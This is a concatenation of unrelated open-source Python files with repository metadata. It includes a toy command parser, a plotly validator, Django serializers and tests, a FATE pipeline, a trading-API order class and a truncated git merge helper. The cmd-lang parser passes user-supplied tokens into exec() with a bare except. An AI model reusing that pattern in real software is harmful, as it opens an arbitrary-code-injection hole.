"MIT"
] | null | null | null |
main.py
|
HenryFleming/cmd-lang
|
f98b34a8d79cdc92e91531b82b183176118faf25
|
[
"MIT"
] | null | null | null |
#Copyright (c) 2020 HenryFleming
#see LICENSE for more
def parse_line(cmds,line):
parts = []
last_part = ""
skiping = False
for char in line:
if char==" "and not skiping:
parts.append(last_part)
last_part=""
if not char==" " or skiping:
if not char=='"':
last_part+=char
if char=='"':
skiping=not skiping
parts.append(last_part)
last_part=""
try:
cmd = parts[0]
args = parts[1:len(parts)]
argsStr = ""
for e in args:
argsStr+='"'+e+'",'
exec('cmds.'+cmd+'(['+argsStr[0:len(argsStr)-1]+'])')
except:
pass
| 21.25
| 57
| 0.568067
|
e00f9c871d21d82de7405d85a5e0d0139ff9c4c7
| 425
|
py
|
Python
|
env/Lib/site-packages/plotly/validators/scattergeo/marker/line/_colorsrc.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 11,750
|
2015-10-12T07:03:39.000Z
|
2022-03-31T20:43:15.000Z
|
env/Lib/site-packages/plotly/validators/scattergeo/marker/line/_colorsrc.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 2,951
|
2015-10-12T00:41:25.000Z
|
2022-03-31T22:19:26.000Z
|
env/Lib/site-packages/plotly/validators/scattergeo/marker/line/_colorsrc.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 2,623
|
2015-10-15T14:40:27.000Z
|
2022-03-28T16:05:50.000Z
|
import _plotly_utils.basevalidators
class ColorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="colorsrc", parent_name="scattergeo.marker.line", **kwargs
):
super(ColorsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
**kwargs
)
| 30.357143
| 84
| 0.658824
|
9067a129687362ff0b25d652ccbc82f1c441eba5
| 691
|
py
|
Python
|
paw2018/userpicks/serializers.py
|
mdcollins80/PAW-api
|
ba40ec77301ac0c84a8ad95481323031b398168b
|
[
"MIT"
] | null | null | null |
paw2018/userpicks/serializers.py
|
mdcollins80/PAW-api
|
ba40ec77301ac0c84a8ad95481323031b398168b
|
[
"MIT"
] | null | null | null |
paw2018/userpicks/serializers.py
|
mdcollins80/PAW-api
|
ba40ec77301ac0c84a8ad95481323031b398168b
|
[
"MIT"
] | null | null | null |
from .models import UserPick
from rest_framework import serializers
from paw2018.nflteams.serializers import TeamIDSerializer
from paw2018.nflgames.serializers import GameIDSerializer
from paw2018.userteams.serializers import UserTeamIDSerializer
class UserPickSerializer(serializers.ModelSerializer):
team = UserTeamIDSerializer(read_only=True)
game = GameIDSerializer(read_only=True)
pick = TeamIDSerializer(read_only=True)
class Meta:
model = UserPick
fields = ('id', 'team', 'game', 'pick', 'correct')
class UserPickPostSerializer(serializers.ModelSerializer):
class Meta:
model = UserPick
fields = ('id', 'team', 'game', 'pick')
| 31.409091
| 62
| 0.746744
|
716246e64ee3d8f51ed1c144e04badc2d1c41403
| 1,676
|
py
|
Python
|
allegation/tests/views/ui/test_redirect_mobile_urls_to_desktop.py
|
invinst/CPDB
|
c2d8ae8888b13d956cc1068742f18d45736d4121
|
[
"Apache-2.0"
] | 16
|
2016-05-20T09:03:32.000Z
|
2020-09-13T14:23:06.000Z
|
allegation/tests/views/ui/test_redirect_mobile_urls_to_desktop.py
|
invinst/CPDB
|
c2d8ae8888b13d956cc1068742f18d45736d4121
|
[
"Apache-2.0"
] | 2
|
2016-05-24T01:44:14.000Z
|
2016-06-17T22:19:45.000Z
|
allegation/tests/views/ui/test_redirect_mobile_urls_to_desktop.py
|
invinst/CPDB
|
c2d8ae8888b13d956cc1068742f18d45736d4121
|
[
"Apache-2.0"
] | 2
|
2016-10-10T16:14:19.000Z
|
2020-10-26T00:17:02.000Z
|
from django.core.urlresolvers import reverse
from allegation.factories import OfficerFactory, AllegationCategoryFactory, OfficerAllegationFactory
from allegation.tests.utils.filter_tags_test_mixin import FilterTagsTestMixin
from common.tests.core import BaseLiveTestCase
from mobile.tests.mixins.mobile_visiting_url_mixins import MobileVisitingUrlMixins
class MobileComplaintPageRedirectTest(MobileVisitingUrlMixins, FilterTagsTestMixin, BaseLiveTestCase):
def assert_current_url_is_data_tool_page(self):
self.browser.current_url.should.contain('/data')
def test_redirect_mobile_complaint_page_to_data_tool(self):
category = AllegationCategoryFactory()
officer_allegation = OfficerAllegationFactory(cat=category)
crid = officer_allegation.allegation.crid
cat_id = category.id
self.visit_complaint_page(crid, cat_id)
self.assert_current_url_is_data_tool_page()
self.assert_have_filter_tags('Allegation ID', crid)
self.assert_have_filter_tags('Allegation Type', category.category)
class MobileSearchPageRedirectTest(FilterTagsTestMixin, BaseLiveTestCase):
def test_search_page_to_data_tool(self):
officer = OfficerFactory(officer_first='John', officer_last='Henry')
search_url = reverse('allegation:search-q-page', kwargs={'term': officer.officer_first})
self.visit(search_url)
self.assert_have_filter_tags('officer', officer.officer_first)
def test_search_page_no_result_to_homepage(self):
search_url = reverse('allegation:search-q-page', kwargs={'term': 'no_result'})
self.visit(search_url)
self.assert_no_filter_tags()
| 41.9
| 102
| 0.78043
|
dfe8ef1e09278203f038a0d6af34fd46defefb23
| 215
|
py
|
Python
|
service/__init__.py
|
dabarrell/api-mirror
|
b308ac97931ea68bf87cdb8cc18e7d1e7a5e7d29
|
[
"MIT"
] | 4
|
2018-03-20T09:19:25.000Z
|
2020-01-16T01:11:23.000Z
|
service/__init__.py
|
dabarrell/api-mirror
|
b308ac97931ea68bf87cdb8cc18e7d1e7a5e7d29
|
[
"MIT"
] | null | null | null |
service/__init__.py
|
dabarrell/api-mirror
|
b308ac97931ea68bf87cdb8cc18e7d1e7a5e7d29
|
[
"MIT"
] | null | null | null |
from flask import Flask
from .errorhandlers import error_handlers
from .config import configure_app
app = Flask(__name__)
import service.routes
app.register_blueprint(error_handlers)
configure_app(app)
| 19.545455
| 42
| 0.8
|
970fe676936d6f22bf5de2228eaca7cbc7a598fa
| 3,763
|
py
|
Python
|
examples/pipeline/local_baseline/pipeline-local-baseline-homo.py
|
qixiuai/FATE
|
6d50af65b96b5b226afda30dfa8e4a1e5746952d
|
[
"Apache-2.0"
] | null | null | null |
examples/pipeline/local_baseline/pipeline-local-baseline-homo.py
|
qixiuai/FATE
|
6d50af65b96b5b226afda30dfa8e4a1e5746952d
|
[
"Apache-2.0"
] | null | null | null |
examples/pipeline/local_baseline/pipeline-local-baseline-homo.py
|
qixiuai/FATE
|
6d50af65b96b5b226afda30dfa8e4a1e5746952d
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
from pipeline.backend.pipeline import PipeLine
from pipeline.component import DataIO
from pipeline.component import Evaluation
from pipeline.component import HomoLR
from pipeline.component import LocalBaseline
from pipeline.component import Reader
from pipeline.interface import Data
from pipeline.utils.tools import load_job_config
def main(config="../../config.yaml", namespace=""):
# obtain config
if isinstance(config, str):
config = load_job_config(config)
parties = config.parties
guest = parties.guest[0]
host = parties.host[0]
arbiter = parties.arbiter[0]
backend = config.backend
work_mode = config.work_mode
guest_train_data = {"name": "breast_homo_guest", "namespace": f"experiment{namespace}"}
host_train_data = {"name": "breast_homo_host", "namespace": f"experiment{namespace}"}
pipeline = PipeLine().set_initiator(role='guest', party_id=guest).set_roles(guest=guest, host=host, arbiter=arbiter)
reader_0 = Reader(name="reader_0")
reader_0.get_party_instance(role='guest', party_id=guest).algorithm_param(table=guest_train_data)
reader_0.get_party_instance(role='host', party_id=host).algorithm_param(table=host_train_data)
dataio_0 = DataIO(name="dataio_0", with_label=True, output_format="dense",
label_type="int", label_name="y")
homo_lr_0 = HomoLR(name="homo_lr_0", penalty="L2", optimizer="sgd",
tol=0.0001, alpha=0.01, max_iter=30, batch_size=-1,
early_stop="weight_diff", learning_rate=0.15, init_param={"init_method": "zeros"})
local_baseline_0 = LocalBaseline(name="local_baseline_0", model_name="LogisticRegression",
model_opts={"penalty": "l2", "tol": 0.0001, "C": 1.0, "fit_intercept": True,
"solver": "saga", "max_iter": 2})
local_baseline_0.get_party_instance(role='guest', party_id=guest).algorithm_param(need_run=True)
local_baseline_0.get_party_instance(role='host', party_id=host).algorithm_param(need_run=False)
evaluation_0 = Evaluation(name="evaluation_0", eval_type="binary", pos_label=1)
evaluation_0.get_party_instance(role='guest', party_id=guest).algorithm_param(need_run=True)
evaluation_0.get_party_instance(role='host', party_id=host).algorithm_param(need_run=False)
pipeline.add_component(reader_0)
pipeline.add_component(dataio_0, data=Data(data=reader_0.output.data))
pipeline.add_component(homo_lr_0, data=Data(train_data=dataio_0.output.data))
pipeline.add_component(local_baseline_0, data=Data(train_data=dataio_0.output.data))
pipeline.add_component(evaluation_0, data=Data(data=[homo_lr_0.output.data, local_baseline_0.output.data]))
pipeline.compile()
pipeline.fit(backend=backend, work_mode=work_mode)
if __name__ == "__main__":
parser = argparse.ArgumentParser("PIPELINE DEMO")
parser.add_argument("-config", type=str,
help="config file")
args = parser.parse_args()
if args.config is not None:
main(args.config)
else:
main()
| 44.270588
| 120
| 0.714855
|
56c3b1a197613e4f6ecdecc0b4cfce7533c60602
| 1,516
|
py
|
Python
|
src/collectors/ipvs/test/testipvs.py
|
vimeo/Diamond
|
542c3640cf9453a2accd5e8aecfb7caabd26d785
|
[
"MIT"
] | 2
|
2015-06-02T16:18:23.000Z
|
2020-07-28T06:07:29.000Z
|
src/collectors/ipvs/test/testipvs.py
|
vimeo/Diamond
|
542c3640cf9453a2accd5e8aecfb7caabd26d785
|
[
"MIT"
] | null | null | null |
src/collectors/ipvs/test/testipvs.py
|
vimeo/Diamond
|
542c3640cf9453a2accd5e8aecfb7caabd26d785
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# coding=utf-8
################################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from ipvs import IPVSCollector
################################################################################
class TestIPVSCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('IPVSCollector', {
'interval': 10,
'bin': 'true',
'use_sudo': False
})
self.collector = IPVSCollector(config, None)
@patch('os.access', Mock(return_value=True))
@patch.object(Collector, 'publish')
def test_should_work_with_real_data(self, publish_mock):
with patch('subprocess.Popen.communicate', Mock(return_value=(
self.getFixture('ipvsadm').getvalue(), '')
)):
self.collector.collect()
metrics = {
"172_16_1_56:80.total.conns": 116,
"172_16_1_56:443.total.conns": 59,
"172_16_1_56:443.10_68_15_66:443.conns": 59,
"172_16_1_56:443.10_68_15_66:443.outbytes": 216873,
}
self.setDocExample(self.collector.__class__.__name__, metrics)
self.assertPublishedMany(publish_mock, metrics)
################################################################################
if __name__ == "__main__":
unittest.main()
| 31.583333
| 80
| 0.551451
|
4450676459632886beb28ddf711d6de394da4677
| 4,741
|
py
|
Python
|
getdata.py
|
afaan5556/dash_weatherdata
|
536fc84b6de5d588585a69f743563f2210eaa21b
|
[
"MIT"
] | null | null | null |
getdata.py
|
afaan5556/dash_weatherdata
|
536fc84b6de5d588585a69f743563f2210eaa21b
|
[
"MIT"
] | null | null | null |
getdata.py
|
afaan5556/dash_weatherdata
|
536fc84b6de5d588585a69f743563f2210eaa21b
|
[
"MIT"
] | null | null | null |
import pandas as pd
import os
import csv
## CONSTANTS
# Directory where TMY data lives
DIRECTORY = '../../../tmy_data/'
# A file in the directory to access df columns
DUMMYFILE = '690150TYA.csv'
## CATCHER / PRE-SETUP DATA STRUCTURES
# Dictionary which will have keys:epw station name, values:dataframe
DF_DICT = {}
# List that will be used to house a list of dicts (k: station name as string, v: df)
PLOT_SERIES_LIST = []
# List that will be used to house the values (df) in PLOT_SERIES_LIST as lists
PLOT_SERIES_TOLIST = []
# List that will be used to house the final list data readable by the dash plot function
DASH_PLOT_DATA = []
# Function that takes a csv file and iterates 1 time to read the first row and appends the needed data to a list
def extract_city_state(csv_file):
head = []
with open(csv_file, "rt") as f:
# Read in the first line, split it on end line character, then split the first element on the comma
head = f.readline().split('\n')[0].split(',')
output_string = ""
# range(1, 3) used so that only the city and state are extracted
for i in range(1, 3):
output_string += head[i] + ", "
output_string = output_string[:-2]
return output_string
## DATA SETUP AND USER PROMPT/VALIDATION FUNCTIONS AND LOOPS
# Function to make a df
def make_df(file=str):
return pd.read_csv(DIRECTORY + file, skiprows=1)
# Function that prints a message as a banner
def banner_print(message=str):
print("")
print("#"*30, " ", message, " ", "#"*30)
print("")
# Show indexed list of parameters
def show_indexed_list(list_to_show, string_parameter):
banner_print("Here are the %s:" %string_parameter)
for index, i in enumerate(list_to_show):
# The + 1 prints indices starting at 1 instead of 0
print(index + 1, ": ", i)
print(" ")
# User input function with validation
def user_input_and_val(input_string, check_object):
while True:
try:
user_input = int(input("Enter %s: " %input_string))
if user_input < 1 or user_input > len(check_object):
print("Please enter a positive integer between 1 and %s" %len(check_object))
continue
break
except ValueError:
print("Invalid choice. Enter a positive integer only")
return user_input
def main():
# Create dummy df
test_df = make_df(DUMMYFILE)
# Set up x-axis date time list
date_time = [str(i) + " " + str(j) for i, j in zip(test_df['Date (MM/DD/YYYY)'].tolist(), test_df['Time (HH:MM)'].tolist())]
# Create a list of climate file parameters
plot_parameters = list(test_df.columns)
# Read all files as df and store each in a dict where:
# key = station name (string)
# value = df
for roots, dirs, files in os.walk(DIRECTORY):
for file in files:
DF_DICT[extract_city_state(DIRECTORY + file)] = make_df(file)
# Create a correspoding list of the df_dict keys
DF_LIST = list(DF_DICT.keys())
# Tell user how many stations are available
banner_print("There are %s stations available to plot." %len(DF_LIST))
# Get station quantity to plot from user
station_qty = user_input_and_val("number of stations to display on plot:", DF_DICT)
# Show indexed list of parameters to user
show_indexed_list(plot_parameters, "available plot parameters")
# Get plot parameter from user
# The - 1 takes the screen index that starts at 1 and resets it to list indices that start at 0
plot_parameter_index = user_input_and_val("the index of the parameter to plot:", plot_parameters) - 1
chosen_parameter = plot_parameters[plot_parameter_index]
## LOOP TO GET
# Loop [user station qty] times
for i in range(1, station_qty + 1):
# Show indexed list of stations
show_indexed_list(DF_LIST, "stations")
# Get user station selection | The - 1 takes the screen index that starts at 1 and resets it to list indices that start at 0
user_selection_i = user_input_and_val("index of station %s to add to plot:" %i, DF_LIST) - 1
# Add series from selected station df to plot series list
chosen_df = DF_DICT[DF_LIST[user_selection_i]]
PLOT_SERIES_LIST.append({DF_LIST[user_selection_i] : chosen_df[chosen_parameter]})
# Remove the user selected item from the list
DF_LIST.pop(user_selection_i)
# Each element in the list of dicts
for i in list(PLOT_SERIES_LIST):
# Each listified element (listified because 'i' is a dict whose values df's)
for j in list(i.values()):
# The listified values still have indices. Append them to the catcher list object using .tolist()
PLOT_SERIES_TOLIST.append(j.tolist())
for i, j in zip(PLOT_SERIES_TOLIST, PLOT_SERIES_LIST):
# Plot data is element in list based list
# Series name is the key in each dict element of the df based list
DASH_PLOT_DATA.append({'x': date_time, 'y': i, 'type': 'line', 'name': list(j.keys())[0]})
return DASH_PLOT_DATA, chosen_parameter
| 38.544715
| 126
| 0.72896
|
1923a3d27012dc0cf325e520774cc2e2f474d00a
| 755
|
py
|
Python
|
Cartwheel/lib/Python26/Lib/site-packages/OpenGL/GL/ATI/draw_buffers.py
|
MontyThibault/centre-of-mass-awareness
|
58778f148e65749e1dfc443043e9fc054ca3ff4d
|
[
"MIT"
] | null | null | null |
Cartwheel/lib/Python26/Lib/site-packages/OpenGL/GL/ATI/draw_buffers.py
|
MontyThibault/centre-of-mass-awareness
|
58778f148e65749e1dfc443043e9fc054ca3ff4d
|
[
"MIT"
] | null | null | null |
Cartwheel/lib/Python26/Lib/site-packages/OpenGL/GL/ATI/draw_buffers.py
|
MontyThibault/centre-of-mass-awareness
|
58778f148e65749e1dfc443043e9fc054ca3ff4d
|
[
"MIT"
] | null | null | null |
'''OpenGL extension ATI.draw_buffers
This module customises the behaviour of the
OpenGL.raw.GL.ATI.draw_buffers to provide a more
Python-friendly API
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.ATI.draw_buffers import *
### END AUTOGENERATED SECTION
@lazy( glDrawBuffersATI )
def glDrawBuffersATI( baseOperation, n=None, bufs=None ):
"""glDrawBuffersATI( bufs ) -> bufs
Wrapper will calculate n from dims of bufs if only
one argument is provided...
"""
if bufs is None:
bufs = n
n = None
bufs = arrays.GLenumArray.asArray( bufs )
if n is None:
n = arrays.GLenumArray.arraySize( bufs )
return baseOperation( n,bufs )
| 26.964286
| 57
| 0.750993
|
256bf6b7f0ebcc72134e9321060f0d35cd6bb064
| 3,399
|
py
|
Python
|
src/Final_Version/View/DisplayPowerups.py
|
qw33ha/T-Rex_Acceleration
|
491de89a6e532ac0cbda611a0ed3dd18fd858d11
|
[
"BSD-3-Clause"
] | 2
|
2021-06-02T05:52:23.000Z
|
2021-07-12T05:56:49.000Z
|
src/Final_Version/View/DisplayPowerups.py
|
qw33ha/T-Rex_Acceleration
|
491de89a6e532ac0cbda611a0ed3dd18fd858d11
|
[
"BSD-3-Clause"
] | null | null | null |
src/Final_Version/View/DisplayPowerups.py
|
qw33ha/T-Rex_Acceleration
|
491de89a6e532ac0cbda611a0ed3dd18fd858d11
|
[
"BSD-3-Clause"
] | null | null | null |
"""@package docstring
Documentation for this module.
DisplayPowerups class
Author: Dev^(enthusiases)
This class is responsible for displaying powerups on the screen.
"""
import random
import sys
import pygame
import time
sys.path.insert(1, '../Model')
import Powerups
import DetectCollision
##
# @file DisplayPowerups.py
# @brief This class is responsible for maintaining all powerups on the screen
## This is a class for powerups displaying
class DisplayPowerups():
POWERUPS_WIDTH = 65
POWERUPS_HEIGH = 65
INTERVAL_TIME = 1
RANDOMNESS = 0.01
RANDOM_MIN = 3
RANDOM_MAX = 5
## @brief Constructor of for DisplayPowerups class
# @param game_screen the game screen, a pygame.display object, where powerups are drawn
# @exception Exception IllegalArgumentException
def __init__(self, game_screen):
if (game_screen is None):
raise Exception("IllegalArguemntException")
self.__game_screen = game_screen
self.__powerups_displayed = pygame.sprite.Group()
self.__generate_time = time.time()
## @brief Get the list of powerups on the screen
# @return a list of powerups on the screen
def get_powerups_list(self):
return self.__powerups_displayed
## @brief Remove a powerup from the list
# @param p the powerup to be removed
def remove_powerups(self, p):
self.__powerups_displayed.remove(p)
## @brief Randomly generate a powerup
# @param speed the speed of the powerup
# @param obstacles list of obstacles on the screen
# @param onstacle_spawn_time the spawn time of obstacles
def generate_powerups(self, speed, obstacles, obstacle_spawn_time):
current_time = time.time()
if (current_time >= self.__generate_time + random.randint(DisplayPowerups.RANDOM_MIN, DisplayPowerups.RANDOM_MAX)
and current_time - obstacle_spawn_time >= DisplayPowerups.INTERVAL_TIME
and random.random() < DisplayPowerups.RANDOMNESS):
overlapping = False
new_powerups = Powerups.Powerups(self.__game_screen, DisplayPowerups.POWERUPS_WIDTH, DisplayPowerups.POWERUPS_HEIGH, speed)
for obstacle in obstacles:
if DetectCollision.detect_collision(obstacle, new_powerups):
overlapping = True
if not overlapping:
self.__powerups_displayed.add(new_powerups)
self.__generate_time = time.time()
## @brief Draw a powerup on the screen
# @param powerups the powerup to be drawn
def draw_powerups(self, powerups):
for p in powerups:
self.__game_screen.blit(p.get_img(), p.get_rect())
## @brief Update the position and draw all powerups in the list
# @param obstacles list of obstacles on the screen
def update_powerups(self, obstacles):
for element in self.__powerups_displayed:
overlapping = DetectCollision.find_collision_powerups(element, obstacles)
self.remove_powerups(overlapping)
element.update()
if element.get_rect().right < 0:
self.__powerups_displayed.remove(element)
## @brief Update the speed of all powerups on the screen
# @param speed the new speed of these powerups
def update_speed(self, speed):
for element in self.__powerups_displayed:
element.set_speed(speed)
| 37.351648
| 135
| 0.693439
|
f582509eeb59ed601e3b76763b45506d50770431
| 1,576
|
py
|
Python
|
package.py
|
OSS-Pipeline/rez-oiio
|
7c3a2e9ff5107078f8b3ea7a1d52bc19512710ad
|
[
"MIT"
] | null | null | null |
package.py
|
OSS-Pipeline/rez-oiio
|
7c3a2e9ff5107078f8b3ea7a1d52bc19512710ad
|
[
"MIT"
] | null | null | null |
package.py
|
OSS-Pipeline/rez-oiio
|
7c3a2e9ff5107078f8b3ea7a1d52bc19512710ad
|
[
"MIT"
] | null | null | null |
name = "oiio"
version = "2.1.16.0"
authors = [
"Sony Pictures Imageworks"
]
description = \
"""
OpenImageIO is a library for reading and writing images, and a bunch of related classes, utilities, and
applications. There is a particular emphasis on formats and functionality used in professional, large-scale
animation and visual effects work for film. OpenImageIO is used extensively in animation and VFX studios all
over the world, and is also incorporated into several commercial products.
"""
requires = [
"boost-1.61+",
"cmake-3+",
"gcc-6+",
"glew-2+",
"ilmbase-2.2+<2.4",
"jpeg_turbo-2+",
"numpy-1.12+",
"ocio-1.0.9+",
"openexr-2.2+<2.4",
"openjpeg-2+",
"png-1.6+",
"pugixml-1+",
"pybind11-2.2+",
"python-2.7+<3",
"tbb-2017.U6+",
"tiff-4+",
"zlib-1.2+"
]
variants = [
["platform-linux"]
]
tools = [
"iconvert",
"idiff",
"igrep",
"iinfo",
"maketx",
"oiiotool"
]
build_system = "cmake"
with scope("config") as config:
config.build_thread_count = "logical_cores"
uuid = "oiio-{version}".format(version=str(version))
def commands():
env.PATH.prepend("{root}/bin")
env.LD_LIBRARY_PATH.prepend("{root}/lib64")
env.PYTHONPATH.prepend("{root}/lib64/python" + str(env.REZ_PYTHON_MAJOR_VERSION) + "." + str(env.REZ_PYTHON_MINOR_VERSION) + "/site-packages")
# Helper environment variables.
env.OIIO_BINARY_PATH.set("{root}/bin")
env.OIIO_INCLUDE_PATH.set("{root}/include")
env.OIIO_LIBRARY_PATH.set("{root}/lib64")
| 23.878788
| 146
| 0.634518
|
75af6d2884c91b1342454f7381f33c0e5c1e0c83
| 5,179
|
py
|
Python
|
.venv/lib/python3.8/site-packages/fxcmpy/fxcmpy_oco_order.py
|
eo1989/VectorBTanalysis
|
bea3deaf2ee3fc114b308146f2af3e4f35f70197
|
[
"MIT"
] | null | null | null |
.venv/lib/python3.8/site-packages/fxcmpy/fxcmpy_oco_order.py
|
eo1989/VectorBTanalysis
|
bea3deaf2ee3fc114b308146f2af3e4f35f70197
|
[
"MIT"
] | null | null | null |
.venv/lib/python3.8/site-packages/fxcmpy/fxcmpy_oco_order.py
|
eo1989/VectorBTanalysis
|
bea3deaf2ee3fc114b308146f2af3e4f35f70197
|
[
"MIT"
] | null | null | null |
#
# fxcmpy_oco_order -- A Python Wrapper Class for the
# RESTful API as provided by FXCM Forex Capital Markets Ltd.
#
# Proof-of-Concept | Prototype Version for Illustration
# by The Python Quants GmbH
#
# The codes contained herein come without warranties or representations,
# to the extent permitted by applicable law.
#
# Read the RISK DISCLAIMER carefully.
#
# (c) FXCM Forex Capital Markets Ltd.
#
import datetime as dt
from fxcmpy.fxcmpy_order import fxcmpy_order
class fxcmpy_oco_order(object):
""" A class to realize oco orders of the FXCM API.
Caution:
Do not initialize fxcm oco order object manually, these orders will not
registered by the fxcm server, use the create_oco_order() method of the
fxcm class instead.
"""
def __init__(self, bulk_id, orders, connection, logger):
self.orders = dict()
self.logger = logger
self.__con = connection
try:
self.bulk_id = int(bulk_id)
except:
raise TypeError('bulk_id must be an integer.')
for order in orders:
if not isinstance(order, fxcmpy_order):
raise TypeError('orders must be of type fxcmpy_orders.')
order_id = order.get_orderId()
self.orders[order_id] = order
self.logger.info('Add order with id %s to oco order.' % order_id)
def get_ocoBulkId(self):
""" Return the id. """
return self.bulk_id
def get_orders(self):
""" Return all orders of the oco order."""
return list(self.orders.values())
def get_order_ids(self):
""" Return all ids of the containing orders."""
return list(self.orders.keys())
def add_order(self, orders):
""" Add orders to the oco order.
Arguments:
orders: list,
list of the orders to add to the oco order.
"""
order_ids = list()
for order in orders:
if not isinstance(order, fxcmpy_order):
self.logger.error('Invalid order in add_order: %s.' % order)
raise ValueError('order must be of type fxcmpy_order.')
if order.get_ocoBulkId() == self.bulk_id:
self.logger.warn('order allready member of oco order.')
else:
order_ids.append(order.get_orderId())
self.__con.add_to_oco(order_ids, self.bulk_id)
self.logger.info('Orders %s aded to oco order %s.'
% (order_ids, self.bulk_id))
def remove_order(self, orders):
""" Remove orders from the oco order.
Arguments:
orders: list,
list of the order to remove from the oco order.
"""
order_ids = list()
for order in orders:
if not isinstance(order, fxcmpy_order):
self.logger.error('Invalid order in add_order: %s.' % order)
raise ValueError('order must be of type fxcmpy_order.')
if order.get_ocoBulkId() != self.bulk_id:
self.logger.warn('order not member of oco order.')
else:
order_ids.append(order.get_orderId())
self.__con.remove_from_oco(order_ids)
self.logger.info('Orders %s removed from oco order %s.'
% (order_ids, self.bulk_id))
def edit_order(self, add_orders, remove_orders):
""" Add or remove orders to / from the oco order.
Arguments:
add_orders: list,
list of the orders to add to the oco order.
remove_orders: list,
list of the order to remove from the oco order.
"""
add_order_ids = list()
remove_order_ids = list()
for order in add_orders:
if not isinstance(order, fxcmpy_order):
self.logger.error('Invalid order in add_orders: %s.' % order)
raise ValueError('order must be of type fxcmpy_order.')
if order.get_ocoBulkId() == self.bulk_id:
self.logger.warn('order allready member of oco order.')
else:
add_order_ids.append(order.get_orderId())
for order in remove_orders:
if not isinstance(order, fxcmpy_order):
self.logger.error('Invalid order in remove_orders: %s' % order)
raise ValueError('order must be of type fxcmpy_order.')
if order.get_ocoBulkId() != self.bulk_id:
self.logger.warn('order is not member of oco order.')
else:
remove_order_ids.append(order.get_orderId())
self.__con.edit_oco(self.bulk_id, add_order_ids=add_order_ids,
remove_order_ids=remove_order_ids)
def __add__(self, order):
if not isinstance(order, fxcmpy_order):
raise TypeError('orders must be of type fxcmpy_orders.')
order_id = order.get_orderId()
self.orders[order_id] = order
def __remove__(self, order):
if not isinstance(order, fxcmpy_order):
raise TypeError('orders must be of type fxcmpy_orders.')
order_id = order.get_orderId()
del self.orders[order_id]
| 33.412903
| 79
| 0.603012
|
6895a0d07c0afff8ab3687d9437d2fbc7dd2ef7c
| 13,972
|
py
|
Python
|
contrib/devtools/github-merge.py
|
doriancoins/doriancoin
|
1ff8a0324b642c030825d08bcc298fcde04dd7ec
|
[
"MIT"
] | null | null | null |
contrib/devtools/github-merge.py
|
doriancoins/doriancoin
|
1ff8a0324b642c030825d08bcc298fcde04dd7ec
|
[
"MIT"
] | null | null | null |
contrib/devtools/github-merge.py
|
doriancoins/doriancoin
|
1ff8a0324b642c030825d08bcc298fcde04dd7ec
|
[
"MIT"
] | 1
|
2017-12-04T07:18:09.000Z
|
2017-12-04T07:18:09.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2016-2017 Doriancoin Core Developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# This script will locally construct a merge commit for a pull request on a
# github repository, inspect it, sign it and optionally push it.
# The following temporary branches are created/overwritten and deleted:
# * pull/$PULL/base (the current master we're merging onto)
# * pull/$PULL/head (the current state of the remote pull request)
# * pull/$PULL/merge (github's merge)
# * pull/$PULL/local-merge (our merge)
# In case of a clean merge that is accepted by the user, the local branch with
# name $BRANCH is overwritten with the merged result, and optionally pushed.
from __future__ import division,print_function,unicode_literals
import os
from sys import stdin,stdout,stderr
import argparse
import hashlib
import subprocess
import sys
import json,codecs
try:
from urllib.request import Request,urlopen
except:
from urllib2 import Request,urlopen
# External tools (can be overridden using environment)
GIT = os.getenv('GIT','git')
BASH = os.getenv('BASH','bash')
# OS specific configuration for terminal attributes
ATTR_RESET = ''
ATTR_PR = ''
COMMIT_FORMAT = '%h %s (%an)%d'
if os.name == 'posix': # if posix, assume we can use basic terminal escapes
ATTR_RESET = '\033[0m'
ATTR_PR = '\033[1;36m'
COMMIT_FORMAT = '%C(bold blue)%h%Creset %s %C(cyan)(%an)%Creset%C(green)%d%Creset'
def git_config_get(option, default=None):
'''
Get named configuration option from git repository.
'''
try:
return subprocess.check_output([GIT,'config','--get',option]).rstrip().decode('utf-8')
except subprocess.CalledProcessError as e:
return default
def retrieve_pr_info(repo,pull):
'''
Retrieve pull request information from github.
Return None if no title can be found, or an error happens.
'''
try:
req = Request("https://api.github.com/repos/"+repo+"/pulls/"+pull)
result = urlopen(req)
reader = codecs.getreader('utf-8')
obj = json.load(reader(result))
return obj
except Exception as e:
print('Warning: unable to retrieve pull information from github: %s' % e)
return None
def ask_prompt(text):
print(text,end=" ",file=stderr)
stderr.flush()
reply = stdin.readline().rstrip()
print("",file=stderr)
return reply
def get_symlink_files():
files = sorted(subprocess.check_output([GIT, 'ls-tree', '--full-tree', '-r', 'HEAD']).splitlines())
ret = []
for f in files:
if (int(f.decode('utf-8').split(" ")[0], 8) & 0o170000) == 0o120000:
ret.append(f.decode('utf-8').split("\t")[1])
return ret
def tree_sha512sum(commit='HEAD'):
# request metadata for entire tree, recursively
files = []
blob_by_name = {}
for line in subprocess.check_output([GIT, 'ls-tree', '--full-tree', '-r', commit]).splitlines():
name_sep = line.index(b'\t')
metadata = line[:name_sep].split() # perms, 'blob', blobid
assert(metadata[1] == b'blob')
name = line[name_sep+1:]
files.append(name)
